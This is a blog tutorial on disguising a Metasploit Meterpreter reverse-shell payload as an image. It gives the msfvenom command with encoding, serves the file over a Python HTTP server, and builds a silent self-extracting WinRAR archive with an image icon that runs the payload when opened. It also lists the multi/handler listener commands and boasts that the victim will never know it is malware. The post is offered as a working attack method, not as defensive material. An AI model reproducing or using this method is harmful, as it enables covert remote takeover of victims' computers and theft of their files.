Thursday, 14 May 2020

HOW TO EMBED OR BIND PAYLOAD WITH AN IMAGE FILE TO GAIN ROOT ACCESS

HOW TO EMBED OR BIND PAYLOAD WITH AN IMAGE FILE TO GAIN ROOT ACCESS

 

SO HELLO GUYS ,
TODAY I GONNA SHOW YOU HOW YOU CAN EMBED AND BIND PAYLOAD WITH AN IMAGE FILE AND HOW YOU CAN GET THE ROOT ACCESS AFTER EXECUTING THE PAYLOAD OR IMAGE . YA I KNOW THAT YOU HAVE A QUESTION IN YOUR MIND THAT AN IMAGE CANNOT BE EXECUTED. SO READ THE FULL ARTICLE OR WATCH THE VIDEO LINK ABOVE.

TOOLS WHICH I USED :

1. KALI 2020.1 ( FOR MAKING THE PAYLOAD )

2. IMAGE FILE

3. QUICK ANY2ICO ( TO CONVERT IMAGE FILE INTO AN ICON )

4. WINRAR ( USE TO BIND THE PAYLOAD WITH IMAGE FILE )

PROCEDURE :

1. OPEN KALI AND MAKE A PAYLOAD ( TO MAKE A PAYLOAD OPEN THE 

TERMINAL AND TYPE msfvenom -p windows/meterpreter/reverse_tcp lport=4444 

lhost=<YOUR IP> -e x86/shikata_ga_nai -f exe </root/Desktop/payload.exe ) AND 

DOWNLOAD THAT FILE ON THE WINDOWS MACHINE BY STARTING THE PYTHON 

SERVER ( TO START THE PYTHON SERVER WRITE THE COMMAND IN THE 

TERMINAL python -m SimpleHTTPServer 8080 ). AFTER RUNNING THE SERVER GO 

TO YOUR WINDOW MACHINE , OPEN THE BROWSER AND TYPE 

www.<YOUR IP>:8080 AND DOWNLOAD YOUR PAYLOAD FILE .

2.  NOW WE WILL MAKE AN ICON WITH IMAGE . TO MAKE AN ICON RUN QUICK 

ANY2ICO AS ADMINISTRATOR SELECT THE IMAGE FILE AND SELECT THE 

DESTINATION FILE WHERE YOU WANT TO SAVE THAT ICON.


3.  AFTER THE ICON HAS CREATED NOW LETS BIND OUR PAYLOAD , TO BIND THE 

PAYLOAD FOLLOW THE STEPS :

          -------- SELECT BOTH THE IMAGE FILE AND PAYLOAD FILE AND RIGHT CLICK                        ON IT AND SELECT ADD TO ARCHIVE .

          ---------NOW YOU WILL SEE A WINDOW IS POP UP AND SELECT THE
                      FOLLOWING OPTION 
                 A : COMPRESSION METHOD = BEST
                 
                 B : ARCHIVE FORMAT =ZIP
                 
                 C : ARCHIVING OPTION = CREATE SFX ARCHIVE
                 
                 D : CLICK ON ADVANCE OPTION FROM THE TOP MENU
             
                 E : CLICK ON SETUP AND YOU WILL SEE RUN AFTER EXTRACTION
                       COLUMN [ IN THAT WRITE BOTH THE PAYLOAD AS WELL AS THE
                       IMAGE FILE NAME WITH THEIR FORMAT SUCH AS .EXE AND .JPG.
                  
                 F :  NOW GO TO THE UPDATE OPTION AND YOU WILL SEE A OVERWRITE 
                        MODE FROM THERE AND SELECT SKIP EXISTING FILES 

                G : NOW GO TO TEXT AND ICON OPTIONS YOU WILL SEE A LOAD SFX
                       ICON OPTION THERE NOW CLICK ON BROWSE AND SELECT YOUR  
                       ICON FILE

                H : NOW GO TO MODE OPTION AND YOU WILL SEE A SILENT MODE MENU
                     AND FROM THERE SELECT HIDE ALL OPTION 

                I : NOW CLICK ON OK AND AGAIN CLICK ON OK.
  
       --------- ALL THE WORK HAS BEEN DONE JUST START THE LISTENING ON THE   
                    KALI MACHINE AND RUN THE ZIP FILE ( TO START THE LISTENING
                    TYPE THE FOLLOWING COMMANDS: )

                 J : OPEN THE TERMINAL AND TYPE THE FOLLOWING COMMANDS :       

                           1. msfconsole

                           2. use exploit/multi handler

                           3. set payload windows/meterpreter/reverse_tcp

                           4. set lport 4444 
                      
                           5. set lhost <YOUR IP>
        
                           6. exploit
                                                                                                                                     

                 H : ALL STEPS ARE DONE NOW JUST OPEN THE IMAGE AND YOU WILL
                       SEE THAT THE SESSION HAS COME AND YOU HAVE ALL THE ACCESS
                       OF THE FILES


 SO IN THIS WAY GUYS YOU CAN BIND YOUR PAYLOAD WITH ANY IMAGE FILE 

AND THE VICTIM WILL NEVER BE ABLE TO GET THAT THIS IS MALWARE. I HOPE 

GUYS YOU LIKE THIS PLEASE COMMENT AND SHARE AND FOR TUTORIAL 

VIDEOS SUBSCRIBE TO OUR YOUTUBE CHANNEL . LINK BELOW :


               
              

Posted by at No comments:
Labels: , , , , , , , , , , , , ,
Subscribe to: Posts (Atom)